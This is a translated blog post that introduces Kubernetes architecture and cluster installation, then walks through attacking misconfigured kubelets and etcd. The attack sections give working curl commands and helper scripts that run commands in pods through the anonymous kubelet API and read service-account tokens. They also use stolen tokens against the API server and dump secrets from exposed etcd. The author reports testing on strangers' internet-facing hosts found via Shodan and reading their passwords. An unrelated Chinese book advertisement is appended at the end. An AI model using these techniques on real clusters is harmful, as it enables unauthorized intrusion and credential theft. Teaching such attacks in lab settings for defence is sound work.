Summary: I noticed that folks in my ops chat group were all studying Kubernetes, and security material on the subject is still scarce in China, which is what prompted this article. I have only been working with k8s for about a week: after getting a rough grasp of the main concepts, I went straight to reproducing various Kubernetes security issues.
Kubernetes Architecture
Kubernetes Cluster
The Master is the brain of the cluster. It runs daemon services including kube-apiserver, kube-scheduler, kube-controller-manager, etcd, and the Pod network (flannel).
Master components
API Server
Exposes an HTTP/HTTPS RESTful API and is the front-end interface of the cluster: client tools and the other Kubernetes components manage the cluster's resources through it.
It provides the REST API for reading and controlling every cluster resource. Administrators generate HTTP requests through kubectl or third-party clients and send them to the API Server; services inside the cluster (the dashboard, for example) also control the cluster through it.
Resources inside the cluster, such as Pods and Nodes, periodically report their state to the API Server. The Controller Manager and Scheduler on the Master likewise go through the API Server to interact with etcd, writing the system state into the etcd database or reading it back out.
Scheduler
The Scheduler decides which Node each Pod runs on, weighing the load, performance, and data of each node to pick the best one.
Controller Manager
Manages cluster resources and keeps them in their desired state. The Controller Manager is made up of several controllers: the replication controller, endpoints controller, namespace controller, service accounts controller, and so on. Each controller manages a different kind of resource.
etcd
etcd stores the cluster configuration and the state of every resource. When data changes, etcd quickly notifies the relevant Kubernetes components.
Pod network
For Pods to communicate with each other, the cluster must deploy a Pod network; flannel is one option.
Node components
Node
A Node runs: kubelet, kube-proxy, and the Pod network (flannel).
kubelet
The kubelet is the Node's agent. The Scheduler sends a Pod's configuration to the kubelet on the chosen node; the kubelet creates and runs the containers accordingly and reports their status back to the Master.
kube-proxy
Every Node runs the kube-proxy service, which forwards TCP/UDP traffic addressed to a service to the backend containers, load-balancing across replicas when there are several.
Pod network
For Pods to communicate with each other, the cluster must deploy a Pod network; flannel is one option.
The Master can run applications as well, so it is also a Node. Almost all Kubernetes components run in Pods:
kubectl get pod --all-namespaces -o wide
The Kubernetes system components are placed in the kube-system namespace. The kubelet is the only Kubernetes component that does not run as a container; it runs as a system service.
As an example, when you run:
kubectl run https-app --image=httpd --replicas=2
- kubectl sends the deployment request to the API Server.
- The API Server notifies the Controller Manager to create a deployment resource.
- The Scheduler performs scheduling and assigns the two replica Pods to node1 and node2.
- The kubelet on node1 and node2 creates and runs the Pods on its own node.
Katacoda offers an online learning platform, so you can experiment without installing k8s yourself.
Installing a Kubernetes cluster with an Ansible playbook
https://github.com/gjmzj/kubeasz
I used three machines for the installation:
IP | Node | Services
---|---|---
192.168.4.110 | master | deploy, master, lb1, etcd
192.168.4.114 | node1 | etcd, node
192.168.4.108 | node2 | etcd, node
Preparation on all three machines:
yum install epel-release
yum update
yum install python
Install and prepare Ansible on the deploy node:
yum install -y python-pip git
pip install pip --upgrade -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
pip install --no-cache-dir ansible -i http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
Generate an SSH key pair:
ssh-keygen
# copy the key to every machine, including this one
ssh-copy-id 192.168.4.110
ssh-copy-id 192.168.4.114
ssh-copy-id 192.168.4.108
# then verify the ssh connections
Set up the k8s deployment files on the deploy node:
git clone https://github.com/gjmzj/kubeasz.git
mkdir -p /etc/ansible
mv kubeasz/* /etc/ansible/
Download the binaries for the version you need from the Baidu net-disk: https://pan.baidu.com/s/1c4RFaA#list/path=%2F
tar zxvf k8s.1-11-2.tar.gz
mv bin/* /etc/ansible/bin/
Configure the cluster parameters:
[root@master ~]# cd /etc/ansible/
[root@master ansible]# cp example/hosts.m-masters.example hosts
# deploy node: usually the node that runs the ansible playbooks
[deploy]
192.168.4.110 NTP_ENABLED=no

# etcd cluster: provide a NODE_NAME for each member; etcd must have an odd number of nodes (1, 3, 5, 7...)
[etcd]
192.168.4.110 NODE_NAME=etcd1
192.168.4.114 NODE_NAME=etcd2
192.168.4.108 NODE_NAME=etcd3

[kube-master]
192.168.4.110
192.168.4.107

[kube-node]
192.168.4.114
192.168.4.108

# load balancers (more than 2 nodes are now supported, but 2 are usually enough); installs haproxy + keepalived
[lb]
192.168.4.107 LB_IF="ens33" LB_ROLE=backup
192.168.4.110 LB_IF="eno16777736" LB_ROLE=master

# cluster MASTER IP, i.e. the VIP of the LB nodes; the VIP listens on 8443 to distinguish it from the default apiserver port
# on public clouds, use the cloud load balancer's internal address and port instead
MASTER_IP="192.168.4.110"
KUBE_APISERVER="https://{{ MASTER_IP }}:8443"

# username and password for the cluster's basic auth
BASIC_AUTH_USER="admin"
BASIC_AUTH_PASS="test1234"
After editing the hosts file, test connectivity with ansible all -m ping:
192.168.4.108 | SUCCESS => {
    "changed": false,
    "ping": "pong"
}
192.168.4.110 | SUCCESS => {
    "changed": false,
    "ping": "pong"
}
192.168.4.114 | SUCCESS => {
    "changed": false,
    "ping": "pong"
}
Step-by-step installation
01. Create certificates and prepare the nodes
ansible-playbook 01.prepare.yml
02. Install the etcd cluster
ansible-playbook 02.etcd.yml
03. Install Docker
ansible-playbook 03.docker.yml
04. Install the master nodes
ansible-playbook 04.kube-master.yml
kubectl get componentstatus    # check the cluster status
05. Install the worker nodes
ansible-playbook 05.kube-node.yml
Check the nodes:
kubectl get nodes
NAME            STATUS   ROLES    AGE   VERSION
192.168.4.108   Ready    node     8h    v1.11.6
192.168.4.110   Ready    master   8h    v1.11.6
192.168.4.114   Ready    node     8h    v1.11.6
06. Deploy the cluster network
ansible-playbook 06.network.yml
Check the pods in the kube-system namespace:
NAME                                    READY   STATUS    RESTARTS   AGE
coredns-695f96dcd5-86r5q                1/1     Running   0          8h
coredns-695f96dcd5-9q4fl                1/1     Running   0          3h
kube-flannel-ds-amd64-87jj7             1/1     Running   1          8h
kube-flannel-ds-amd64-9twqj             1/1     Running   2          8h
kube-flannel-ds-amd64-b4xbm             1/1     Running   1          8h
kubernetes-dashboard-68bf55748d-2bvmx   1/1     Running   0          8h
metrics-server-75df6ff86f-tvp8t         1/1     Running   0          8h
07. Install the cluster add-ons (DNS, dashboard)
ansible-playbook 07.cluster-addon.yml
Check the services in the kube-system namespace:
NAME                   TYPE        CLUSTER-IP      EXTERNAL-IP   PORT(S)                  AGE
kube-dns               ClusterIP   10.68.0.2       <none>        53/UDP,53/TCP,9153/TCP   8h
kubernetes-dashboard   NodePort    10.68.122.176   <none>        443:32064/TCP            8h
metrics-server         ClusterIP   10.68.248.178   <none>        443/TCP                  8h
Check node/pod resource usage:
kubectl top node
kubectl top pod --all-namespaces
Accessing the dashboard
Check the cluster info:
kubectl cluster-info
The login password is the one we set during installation. Get the login token:
kubectl -n kube-system describe secret $(kubectl -n kube-system get secret | grep admin-user | awk '{print $1}')
Kubernetes Security
As a management tool for distributed clusters, keeping the cluster secure is one of Kubernetes' key jobs. The API Server is the broker through which the cluster's components talk to each other as well as the entry point for outside control, so Kubernetes' security mechanisms are essentially designed around protecting the API Server.
Kubernetes secures the API Server in three steps: authentication, authorization, and admission control.
Kubelet authentication
By default, requests to the kubelet's HTTPS endpoint that are not rejected by another configured authentication method are treated as anonymous requests and are given the username system:anonymous and the group system:unauthenticated.
To disable anonymous access and answer unauthenticated requests with 401 Unauthorized, start the kubelet with --anonymous-auth=false.
To enable X509 client-certificate authentication on the kubelet's HTTPS endpoint, pass --client-ca-file with a CA bundle for verifying client certificates, and start the apiserver with the --kubelet-client-certificate and --kubelet-client-key flags.
Secret
Kubernetes has a resource type called Secret, which comes in two flavors: the service-account-token used by ServiceAccounts, and Opaque secrets that hold arbitrary user-defined confidential data. The service-account-token we deal with here has three parts: token, ca.crt, and namespace.
token: a JWT signed with the API Server's private key, used for server-side authentication when accessing the API Server.
ca.crt: the root certificate, used by the client to verify the certificate presented by the API Server.
namespace: the namespace this service-account-token is scoped to.
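As a quick way to see what such a token carries, the JWT payload can be decoded offline without verifying the signature. A minimal Python sketch (the function name is mine; actually verifying the token would need the API Server's public key):

```python
import base64
import json

def decode_jwt_payload(token: str) -> dict:
    """Decode the payload (claims) of a JWT without verifying its signature.

    Enough for inspecting a service-account token offline.
    """
    payload_b64 = token.split(".")[1]
    # JWTs use unpadded base64url encoding; restore the padding first.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))
```

Running it on a service-account token shows claims such as kubernetes.io/serviceaccount/namespace and the service-account name.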
/opt/kube/bin/kubelet --address=192.168.4.114 --allow-privileged=true \
  --anonymous-auth=false --authentication-token-webhook --authorization-mode=Webhook \
  --client-ca-file=/etc/kubernetes/ssl/ca.pem --cluster-dns=10.68.0.2 \
  --cluster-domain=cluster.local. --cni-bin-dir=/opt/kube/bin --cni-conf-dir=/etc/cni/net.d \
  --fail-swap-on=false --hairpin-mode hairpin-veth --hostname-override=192.168.4.114 \
  --kubeconfig=/etc/kubernetes/kubelet.kubeconfig --max-pods=110 --network-plugin=cni \
  --pod-infra-container-image=mirrorgooglecontainers/pause-amd64:3.1 --register-node=true \
  --root-dir=/var/lib/kubelet --tls-cert-file=/etc/kubernetes/ssl/kubelet.pem \
  --tls-private-key-file=/etc/kubernetes/ssl/kubelet-key.pem --v=2
For more detail see: https://k8smeetup.github.io/docs/admin/kubelet-authentication-authorization/
Attacking Kubernetes through the kubelet
With the kubelet's default configuration, an attacker can make privileged requests against the Kubernetes cluster. That access can expose sensitive cluster information and can even lead to command execution on the node machines.
The API Server provides the REST API for accessing and controlling every cluster resource.
Some default setups lack TLS client authentication: --anonymous-auth defaults to true, which allows anonymous access to the kubelet API on port 10250.
/pods # list the running pods
/exec # run a command in a container and return the output
Here I tested against an IP picked at random from Shodan.
Pretty-printed JSON:
{ "kind":"PodList", "apiVersion":"v1", "metadata":{ }, "items":[ { "metadata":{ "name":"monitoring-influxdb-grafana-v4-6679c46745-snl2l", "generateName":"monitoring-influxdb-grafana-v4-6679c46745-", "namespace":"kube-system", "selfLink":"/api/v1/namespaces/kube-system/pods/monitoring-influxdb-grafana-v4-6679c46745-snl2l", "uid":"ccfb1a97-2795-11e9-8a06-00259050b024", "resourceVersion":"303", "creationTimestamp":"2019-02-03T09:26:35Z", "labels":{ "k8s-app":"influxGrafana", "pod-template-hash":"6679c46745", "version":"v4" }, "annotations":{ "kubernetes.io/config.seen":"2019-02-25T15:10:08.316930932Z", "kubernetes.io/config.source":"api", "scheduler.alpha.kubernetes.io/critical-pod":"" }, "ownerReferences":[ { "apiVersion":"apps/v1", "kind":"ReplicaSet", "name":"monitoring-influxdb-grafana-v4-6679c46745", "uid":"cc9879f6-2795-11e9-8a06-00259050b024", "controller":true, "blockOwnerDeletion":true } ] }, "spec":{ "volumes":[ { "name":"influxdb-persistent-storage", "emptyDir":{ } }, { "name":"grafana-persistent-storage", "emptyDir":{ } }, { "name":"default-token-bbz62", "secret":{ "secretName":"default-token-bbz62", "defaultMode":420 } } ], "containers":[ { "name":"influxdb", "image":"k8s.gcr.io/heapster-influxdb-amd64:v1.3.3", "ports":[ { "name":"http", "containerPort":8083, "protocol":"TCP" }, { "name":"api", "containerPort":8086, "protocol":"TCP" } ], "resources":{ "limits":{ "cpu":"100m", "memory":"500Mi" }, "requests":{ "cpu":"100m", "memory":"500Mi" } }, "volumeMounts":[ { "name":"influxdb-persistent-storage", "mountPath":"/data" }, { "name":"default-token-bbz62", "readOnly":true, "mountPath":"/var/run/secrets/kubernetes.io/serviceaccount" } ], "terminationMessagePath":"/dev/termination-log", "terminationMessagePolicy":"File", "imagePullPolicy":"IfNotPresent" }, {
Use that information to execute a command in one of the containers. The curl request:
curl -Gks https://91.xxx.xxx.52:10250/exec/kube-system/hostpath-provisioner-599db8d5fb-lq2d2/hostpath-provisioner \
  -d 'input=1' -d 'output=1' -d 'tty=1' \
  -d 'command=id'
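The same request can also be assembled programmatically. A small sketch that only builds the URL the curl call above sends (host, pod, and container names are placeholders, and the helper name is mine):

```python
from urllib.parse import quote, urlencode

def kubelet_exec_url(host: str, namespace: str, pod: str,
                     container: str, command: str, port: int = 10250) -> str:
    """Build the anonymous kubelet /exec URL, equivalent to the curl -G call."""
    # Percent-encode each path segment in case names contain odd characters.
    path = "/".join(quote(p) for p in ("exec", namespace, pod, container))
    query = urlencode([("input", 1), ("output", 1), ("tty", 1),
                       ("command", command)])
    return f"https://{host}:{port}/{path}?{query}"
```

Sending it would still require an HTTPS client that skips certificate verification, the equivalent of curl's -k.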
Unfortunately, this no longer works against this older target. Besides raw curl requests, there is also a ready-made script for this, Kubelet Anonymous RCE:
https://github.com/serain/kubelet-anon-rce
Example from its help text:
python3 kubelet-anon-rce.py \
  --node 10.1.2.3 \
  --namespace kube-system \
  --pod tiller-797d1b1234-gb6qt \
  --container tiller \
  --exec "ls /tmp"
If you can execute commands, you can read the token under /var/run/secrets/kubernetes.io/serviceaccount and then talk to the kube-apiserver:
curl -ks -H "Authorization: Bearer <TOKEN>" \
  https://master:6443/api/v1/namespaces/{namespace}/secrets
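A sketch of how that authenticated request could be constructed from Python's standard library (the helper name is mine; the request is only built here, not sent):

```python
import urllib.request

def secrets_request(master: str, namespace: str, token: str,
                    port: int = 6443) -> urllib.request.Request:
    """Build (but do not send) an authenticated request for the secrets
    in one namespace, mirroring the curl call above."""
    url = f"https://{master}:{port}/api/v1/namespaces/{namespace}/secrets"
    req = urllib.request.Request(url)
    # The stolen service-account token goes into a Bearer header.
    req.add_header("Authorization", f"Bearer {token}")
    return req
```

Actually sending it needs an SSL context that skips certificate verification, the equivalent of curl -k.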
Test procedure:
- Query /pods for information
- Collect the namespace, pod, and container names
- Use /exec to read the token from /var/run/secrets/kubernetes.io/serviceaccount
- Use the token against the API Server to operate on pods
Finding vulnerabilities with kube-hunter
kube-hunter hunts for security weaknesses in a Kubernetes cluster. It probes the apiserver, dashboard, etcd, hosts, kubelet, ports, and proxy.
https://github.com/aquasecurity/kube-hunter
[root@master kube-hunter]# ./kube-hunter.py
Choose one of the options below:
1. Remote scanning (scans one or more specific IPs or DNS names)
2. Subnet scanning (scans subnets on all local network interfaces)
3. IP range scanning (scans a given IP range)
Your choice: 1
Remotes (separated by a ','): 91.xxx.xxx.52
~ Started ~
Discovering Open Kubernetes Services...
|
| Kubelet API:
|   type: open service
|   service: Kubelet API
|_  host: 91.xxx.xxx.52:10250
|
| Anonymous Authentication:
|   type: vulnerability
|   host: 91.xxx.xxx.52:10250
|   description:
|     The kubelet is misconfigured, potentially
|     allowing secure access to all requests on the
|_    kubelet, without the need to authenticate
......
Nodes
+-------------+---------------+
| TYPE | LOCATION |
+-------------+---------------+
| Node/Master | 192.168.4.114 |
+-------------+---------------+
| Node/Master | 192.168.4.110 |
+-------------+---------------+
| Node/Master | 192.168.4.108 |
+-------------+---------------+
Vulnerabilities

LOCATION | CATEGORY | VULNERABILITY | DESCRIPTION | EVIDENCE
---|---|---|---|---
192.168.4.114:10255 | Information Disclosure | K8s Version Disclosure | The kubernetes version could be obtained from logs in the /metrics endpoint | v1.11.6
192.168.4.114:10255 | Information Disclosure | Exposed Pods | An attacker could view sensitive information about pods that are bound to a Node using the /pods endpoint | count: 5
192.168.4.114:10255 | Information Disclosure | Cluster Health Disclosure | By accessing the open /healthz handler, an attacker could get the cluster health state without authenticating | status: ok
192.168.4.110:10255 | Information Disclosure | K8s Version Disclosure | The kubernetes version could be obtained from logs in the /metrics endpoint | v1.11.6
192.168.4.110:10255 | Information Disclosure | Exposed Pods | An attacker could view sensitive information about pods that are bound to a Node using the /pods endpoint | count: 5
192.168.4.110:10255 | Information Disclosure | Cluster Health Disclosure | By accessing the open /healthz handler, an attacker could get the cluster health state without authenticating | status: ok
192.168.4.108:10255 | Information Disclosure | K8s Version Disclosure | The kubernetes version could be obtained from logs in the /metrics endpoint | v1.11.6
192.168.4.108:10255 | Information Disclosure | Exposed Pods | An attacker could view sensitive information about pods that are bound to a Node using the /pods endpoint | count: 4
192.168.4.108:10255 | Information Disclosure | Cluster Health Disclosure | By accessing the open /healthz handler, an attacker could get the cluster health state without authenticating | status: ok
192.168.4.114:10255 | Access Risk | Privileged Container | A privileged container exists on a node and could expose the node/cluster to unwanted root operations | pod: kube-flannel-ds-amd64-87jj7, contai...
192.168.4.110:10255 | Access Risk | Privileged Container | A privileged container exists on a node and could expose the node/cluster to unwanted root operations | pod: kube-flannel-ds-amd64-9twqj, contai...
192.168.4.108:10255 | Access Risk | Privileged Container | A privileged container exists on a node and could expose the node/cluster to unwanted root operations | pod: kube-flannel-ds-amd64-b4xbm, contai...
From this output we can see that anonymous authentication is enabled and /pods can be queried for information.
Scanning the external IP:
Kubelet API | 91.xxx.xxx.x2:10255
Kubelet API | 91.xxx.xxx.x2:10250
API Server | 91.xxx.xxx.x2:6443
Checking the cluster information:
https://91.xxx.xxx.52:10250/metrics
K8s version | kubernetes | v1.11.6
Pods scheduled on the node:
http://192.168.4.110:10255/pods
Cluster health:
http://192.168.4.110:10255/healthz
Executing commands through the kubelet API
Retrieve the list of all pods and containers scheduled on a Kubernetes worker node:
curl -sk https://192.168.4.110:10250/runningpods/ |python -m json.tool
{ "apiVersion":"v1", "items":[ { "metadata":{ "creationTimestamp":null, "name":"nginx-867878fcd6-vrz75", "namespace":"default", "uid":"6e31a46e-38ea-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"nginx@sha256:dd2d0ac3fff2f007d99e033b64854be0941e19a2ad51f174d9240dda20d9f534", "name":"nginx", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"kubernetes-dashboard-68bf55748d-2bvmx", "namespace":"kube-system", "uid":"3f1dc2eb-38e8-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"mirrorgooglecontainers/kubernetes-dashboard-amd64@sha256:e4b764fa9df0a30c467e7cec000920ea69dcc2ba8a9d0469ffbf1881a9614270", "name":"kubernetes-dashboard", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"metrics-server-75df6ff86f-tvp8t", "namespace":"kube-system", "uid":"351cf73d-38e8-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"mirrorgooglecontainers/metrics-server-amd64@sha256:ad4a7150389426eedbd2bc81ba8067dc4807b7f47697310a8fe917f34475f83e", "name":"metrics-server", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"kube-flannel-ds-amd64-9twqj", "namespace":"kube-system", "uid":"e1da777f-38e7-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"sha256:ff281650a721f46bbe2169292c91031c66411554739c88c861ba78475c1df894", "name":"kube-flannel", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"coredns-695f96dcd5-9q4fl", "namespace":"kube-system", "uid":"1d9b7d65-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"coredns/coredns@sha256:81936728011c0df9404cb70b95c17bbc8af922ec9a70d0561a5d01fefa6ffa51", "name":"coredns", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"nginx-deployment-6fb585c4cc-pf2mq", "namespace":"default", "uid":"1d401e4f-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { 
"image":"nginx@sha256:e3456c851a152494c3e4ff5fcc26f240206abac0c9d794affb40e0714846c451", "name":"nginx-deployment", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"httpd-app-7bdd9f8ff4-thggb", "namespace":"default", "uid":"1d2bc47d-3914-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"httpd@sha256:5e7992fcdaa214d5e88c4dfde274befe60d5d5b232717862856012bf5ce31086", "name":"httpd-app", "resources":{ } } ] }, "status":{ } }, { "metadata":{ "creationTimestamp":null, "name":"redis-55c7cdcd65-hbh5p", "namespace":"default", "uid":"18ce953d-38ee-11e9-8252-000c29361cd0" }, "spec":{ "containers":[ { "image":"redis@sha256:dd5b84ce536dffdcab79024f4df5485d010affa09e6c399b215e199a0dca38c4", "name":"redis", "resources":{ } } ] }, "status":{ } } ], "kind":"PodList", "metadata":{ } }
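To turn a pod listing like the one above into exec/run targets, it helps to flatten it into (namespace, pod, container) triples. A minimal sketch assuming the JSON shape shown above (the function name is mine):

```python
def exec_targets(podlist: dict) -> list:
    """Flatten a /pods or /runningpods/ response into
    (namespace, pod, container) triples usable in exec/run URLs."""
    targets = []
    for item in podlist.get("items", []):
        meta = item["metadata"]
        for c in item["spec"].get("containers", []):
            targets.append((meta["namespace"], meta["name"], c["name"]))
    return targets
```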
curl -k -XPOST "https://kube-node-here:10250/run/kube-system/kube-dns-5b8bf6c4f4-k5n2g/dnsmasq" -d "cmd=id"
Getting a token through the kubelet API
First check whether the environment contains KUBELET_CERT or KUBELET_KEY variables, or a kubelet token:
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=env"
If nothing shows up there, look at the mounted volumes:
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=mount"
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=ls -la /run/secrets/kubernetes.io/serviceaccount"
curl -k -XPOST "https://192.168.4.110:10250/run/default/nginx-867878fcd6-vrz75/nginx" -d "cmd=cat /run/secrets/kubernetes.io/serviceaccount/token"
Decoding the token JWT:
It shows the basic fields of the service-account-token, which are used for the subsequent authorization. We also obtain ca.crt, which the client uses to verify the certificate the API Server presents.
kubectl --server=https://192.168.4.110 --certificate-authority=ca.crt --token=<TOKEN> get pods --all-namespaces
Extracting sensitive information from etcd
etcd, developed by CoreOS, is a distributed service system that uses the raft protocol for consensus. It is a highly available distributed key-value database that stores the cluster state, service tokens, and other confidential configuration.
When its ports are exposed, 2379 (client-to-etcd traffic) and 2380 (traffic between etcd cluster members), the default configuration lets you read this sensitive information directly.
List all keys under the root:
http://114.xxx.xxx.155:2379/v2/keys
Adding the recursive=true parameter recursively lists all the values.
/v2/members: information about each cluster member
http://114.xxx.xxx.155:2379/v2/keys/?recursive=true
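Instead of eyeballing a huge recursive dump, the returned key tree can be searched mechanically. A sketch that walks the node tree of a /v2/keys?recursive=true response (the field names follow the etcd v2 API; the word list and function name are my own choices):

```python
def find_sensitive_keys(node: dict,
                        needles=("password", "token", "secret")) -> list:
    """Walk an etcd v2 key tree and collect the keys whose name or
    value contains one of the given words."""
    hits = []
    stack = [node]
    while stack:
        n = stack.pop()
        key = n.get("key", "")
        value = n.get("value") or ""
        if any(w in key.lower() or w in value.lower() for w in needles):
            hits.append(key)
        # Directory nodes carry their children in a "nodes" list.
        stack.extend(n.get("nodes", []))
    return hits
```

Call it on the node field of the parsed response, e.g. find_sensitive_keys(json.loads(body)["node"]).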
These were mostly big companies (probably customer machines on Tencent Cloud or Alibaba Cloud). Amusingly, all sorts of passwords were in there.
Hardening
See CIS_Kubernetes_Benchmark_v1.2.0, which covers hardening in great detail.
I hope this article is helpful to ops and security folks!
References:
https://github.com/opsnull/follow-me-install-kubernetes-cluster
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-1-qiang-nei-an-zhuang-zi-yuan-gai-nian
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-2-zu-jian-jia-gou
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-3-wang-luo-yuan-li
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-4-an-quan-ji-zhi
https://jiayi.space/post/kubernetescong-ru-men-dao-fang-qi-5-cun-chu-yuan-li
https://paper.li/f-1441107098#/
https://blog.csdn.net/oyym_mv/article/details/85003659
https://labs.mwrinfosecurity.com/blog/attacking-kubernetes-through-kubelet/
https://techbeacon.com/enterprise-it/hackers-guide-kubernetes-security
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-kube-hunter-10255.html
https://www.4armed.com/blog/hacking-kubelet-on-gke/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250.html
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-unauth-kublet-api-10250_16.html
https://elweb.co/the-security-footgun-in-etcd/
http://carnal0wnage.attackresearch.com/2019/01/kubernetes-open-etcd.html
https://raesene.github.io/blog/2017/05/01/Kubernetes-Security-etcd/
https://raesene.github.io/blog/2016/10/14/Kubernetes-Attack-Surface-cAdvisor/
供应链金融是一种带有模式创新的金融服务,它真正渗透到了产业运行的全过程。然而,如何探索这种模式的规律?特别是在"互联网+”时代,不同的产业主体如何更好地利用供应链金融促进产业的发展,成为了众多企业关注的话题。零壹财经攥写的《互联网+供应链金融创新》正是立足于这一点,全面总结反映了中国各行各业,以及不同的经营主体如何在立足产业运营的基础上,通过供应链金融来促进产业的发展具有很好的借鉴意义,其丰富的案......一起来看看 《互联网+供应链金融创新》 这本书的介绍吧!